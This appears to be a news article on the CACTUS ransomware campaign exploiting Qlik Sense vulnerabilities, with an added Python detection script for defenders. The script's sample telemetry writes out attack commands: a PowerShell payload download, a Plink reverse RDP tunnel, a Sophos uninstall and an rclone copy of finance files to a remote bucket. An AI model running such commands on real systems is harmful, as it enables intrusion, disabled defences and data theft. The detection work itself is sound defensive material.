Recent CACTUS Ransomware Campaign Targets Qlik Sense Vulnerabilities
A new ransomware campaign, identified as CACTUS, has been leveraging recently revealed security vulnerabilities within Qlik Sense, a cloud analytics and business intelligence platform. This operation has sparked significant concern among cybersecurity experts, marking the first known use of these vulnerabilities by threat actors to gain initial access to targeted systems.
The Arctic Wolf cybersecurity team, which is actively addressing multiple exploitation incidents related to Qlik Sense, reports that the attacks likely exploit three key vulnerabilities disclosed in the last quarter. Notably, CVE-2023-41265, with a critical CVSS score of 9.9, allows remote attackers to elevate their privileges and execute unauthorized backend requests. Additionally, CVE-2023-41266 presents a path traversal vulnerability that enables unauthenticated attackers to reach unauthorized endpoints. Another critical vulnerability, CVE-2023-48365, also scoring 9.9, results from insufficient validation of HTTP headers, allowing for remote code execution through HTTP tunneling.
Of particular interest, CVE-2023-48365 arose from an incomplete fix for CVE-2023-41265, a point recently emphasized by cybersecurity firm Praetorian. Following its initial disclosure in late August 2023, a remedial patch for CVE-2023-48365 was released on September 20, 2023. Given the ongoing exploitation of these vulnerabilities, it is imperative for organizations utilizing Qlik Sense to apply the latest security updates promptly.
Following successful exploitation, the CACTUS ransomware operators have been observed misusing the Qlik Sense Scheduler service to initiate processes designed to download additional tools for establishing persistence and enabling remote access. Among these tools are ManageEngine Unified Endpoint Management and Security (UEMS), AnyDesk, and Plink. The attackers have also removed existing security software such as Sophos, changed administrative passwords, and created Remote Desktop Protocol (RDP) tunnels.
Ultimately, these actions culminate in the deployment of CACTUS ransomware, with threat actors employing rclone for data exfiltration. The sophistication of this ransomware campaign exemplifies the evolving landscape of cyber threats, necessitating heightened vigilance among business owners.
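The post-exploitation chain described above (the Scheduler service spawning download commands, the arrival of AnyDesk, Plink and rclone, removal of Sophos, and RDP tunnelling) is the part a defender can watch for in endpoint telemetry. The following is an added example, not code from the article or from Arctic Wolf, of a small detection pass over process-creation events. The log lines are constructed for the example; the Scheduler binary name, the field names and the Sophos uninstaller path are assumptions, not details from the article.

```python
import json
import re
from dataclasses import dataclass

# Assumed file name of the Qlik Sense Scheduler service binary (not stated in the article).
SCHEDULER_IMAGE = "scheduler.exe"

# Interpreters and download utilities that a scheduler service has no business spawning.
SUSPICIOUS_CHILDREN = {"powershell.exe", "cmd.exe", "certutil.exe", "curl.exe", "bitsadmin.exe"}

# Tooling named in the article's post-exploitation chain, with a MITRE ATT&CK technique id.
TOOL_SIGNATURES = {
    "anydesk.exe": ("Remote access software (AnyDesk)", "T1219"),
    "plink.exe": ("SSH tunnelling tool (Plink)", "T1572"),
    "rclone.exe": ("Cloud sync tool (rclone), possible exfiltration", "T1567.002"),
}


@dataclass
class Alert:
    rule: str
    technique: str
    pid: int
    detail: str


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse_event(ev: dict) -> list:
    """Apply the four rules to one process-creation event (a dict with
    'pid', 'image', 'parent_image' and 'command_line')."""
    alerts = []
    image = _basename(ev["image"])
    parent = _basename(ev["parent_image"])
    cmd = ev.get("command_line", "")

    # Rule 1: the Qlik Sense Scheduler service spawning a shell or downloader.
    if parent == SCHEDULER_IMAGE and image in SUSPICIOUS_CHILDREN:
        alerts.append(Alert("scheduler-spawns-interpreter", "T1059", ev["pid"],
                            f"{parent} -> {image}: {cmd}"))

    # Rule 2: known remote-access / tunnelling / sync tools from the campaign.
    if image in TOOL_SIGNATURES:
        desc, tid = TOOL_SIGNATURES[image]
        alerts.append(Alert("known-tool", tid, ev["pid"], f"{desc}: {cmd}"))

    # Rule 3: Plink remote port forward that exposes RDP (tcp/3389).
    if image == "plink.exe" and re.search(r"(^|\s)-R\s+\S*3389", cmd):
        alerts.append(Alert("rdp-reverse-tunnel", "T1572", ev["pid"], cmd))

    # Rule 4: command lines that remove the Sophos endpoint agent.
    if "sophos" in cmd.lower() and re.search(r"uninstall|remove|/x\b", cmd, re.I):
        alerts.append(Alert("security-software-removal", "T1562.001", ev["pid"], cmd))
    return alerts


def analyse_log(lines) -> list:
    """Run analyse_event over JSON-encoded event lines and collect every alert."""
    alerts = []
    for line in lines:
        alerts.extend(analyse_event(json.loads(line)))
    return alerts


# Constructed sample telemetry (not real data). Event 2 is a benign Scheduler child.
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"pid": 4120, "parent_image": r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -c \"Invoke-WebRequest http://203.0.113.10/tools.zip -OutFile C:\\Temp\\tools.zip\""},
    {"pid": 4121, "parent_image": r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe",
     "image": r"C:\Program Files\Qlik\Sense\Engine\Engine.exe", "command_line": "Engine.exe"},
    {"pid": 4300, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\ProgramData\AnyDesk\AnyDesk.exe", "command_line": "AnyDesk.exe --silent"},
    {"pid": 4310, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Temp\plink.exe",
     "command_line": "plink.exe -R 3389:127.0.0.1:3389 -N -l svc 203.0.113.10"},
    {"pid": 4320, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Program Files\Sophos\Sophos Endpoint Agent\uninstallcli.exe",
     "command_line": "\"C:\\Program Files\\Sophos\\Sophos Endpoint Agent\\uninstallcli.exe\" --quiet"},
    {"pid": 4400, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Temp\rclone.exe", "command_line": "rclone.exe copy C:\\Shares\\Finance remote:bucket"},
]]

if __name__ == "__main__":
    for a in analyse_log(SAMPLE_EVENTS):
        print(f"[{a.technique}] {a.rule} pid={a.pid}: {a.detail}")
```

The first rule carries the most weight: a business-intelligence scheduler service launching PowerShell or a download utility is unusual enough to alert on regardless of which vulnerability was used to get there, while the tool-name rules are cheap to evade by renaming and are best treated as corroboration.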
As the global ransomware threat continues to evolve, it is imperative to understand the broader context of these attacks. Many ransomware groups have established infrastructures that facilitate large-scale cybercriminal operations. This includes collaborating with initial access brokers and utilizing botnets to resell access to compromised systems. Recent data from industrial cybersecurity firm Dragos indicates a slight decline in ransomware attacks against industrial organizations in the last quarter. However, the reported incidents across all sectors remain alarming, underscoring that ransomware-as-a-service (RaaS) continues to thrive as a potent method for cyber extortion.
The Black Basta ransomware group has emerged as a notable player in this domain, reportedly amassing over $107 million in illicit Bitcoin payments. Their operations have been linked to other notable criminal entities, revealing a complex web of collaboration in the ransomware ecosystem.
For business owners, the MITRE ATT&CK framework provides a useful vocabulary for the tactics employed in these attacks. Techniques such as initial access through exploitation of public-facing applications, persistence through compromised scheduled tasks, and privilege escalation via system vulnerabilities are worth understanding because they illustrate strategies common to many cyber adversaries.
In conclusion, the CACTUS ransomware campaign highlights the growing complexity of cyber threats and the imperative need for robust cybersecurity measures. Organizations must prioritize prompt application of security patches, continuous monitoring for vulnerabilities, and the adoption of a proactive cybersecurity posture to mitigate risks associated with such sophisticated attacks.